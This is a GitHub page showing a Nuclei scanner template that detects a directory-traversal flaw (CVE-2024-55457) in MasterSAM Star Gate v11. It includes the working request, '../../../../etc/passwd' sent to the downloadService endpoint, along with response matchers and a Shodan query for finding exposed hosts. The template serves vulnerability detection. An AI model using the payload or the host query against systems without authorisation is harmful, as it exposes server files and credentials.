forked from projectdiscovery/nuclei-templates
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCVE-2024-55457.yaml
More file actions
40 lines (37 loc) · 1.54 KB
/
CVE-2024-55457.yaml
File metadata and controls
40 lines (37 loc) · 1.54 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
id: CVE-2024-55457
info:
name: MasterSAM Star Gate v11 - Local File Inclusion
author: DhiyaneshDK
severity: high
description: |
MasterSAM Star Gate v11 is vulnerable to a directory traversal attack via the endpoint /adama/adama/downloadService. An attacker can exploit this vulnerability by manipulating the file parameter to access arbitrary files on the server, potentially leading to the exposure of sensitive information.
impact: |
Unauthenticated attackers can exploit directory traversal to read arbitrary files from the server, potentially exposing sensitive configuration data, credentials, and system files.
remediation: |
Contact MasterSAM for a patched version of Star Gate v11 that addresses the directory traversal vulnerability.
reference:
- https://github.com/h13nh04ng/CVE-2024-55457-PoC
- https://x.com/cyber_advising/status/1876034270852231257
classification:
cve-id: CVE-2024-55457
cwe-id: CWE-22
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
epss-score: 0.87182
epss-percentile: 0.99435
metadata:
verified: true
max-request: 1
shodan-query: html:"MasterSAM"
tags: cve,cve2024,lfi,mastersam,v11,adama,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/adama/adama/downloadService?type=1&file=../../../../etc/passwd"
matchers:
- type: dsl
dsl:
- "contains_all(header, 'application/octet-stream', 'filename=')"
- "regex('root:.*:0:0:', body)"
- "status_code == 200"
condition: and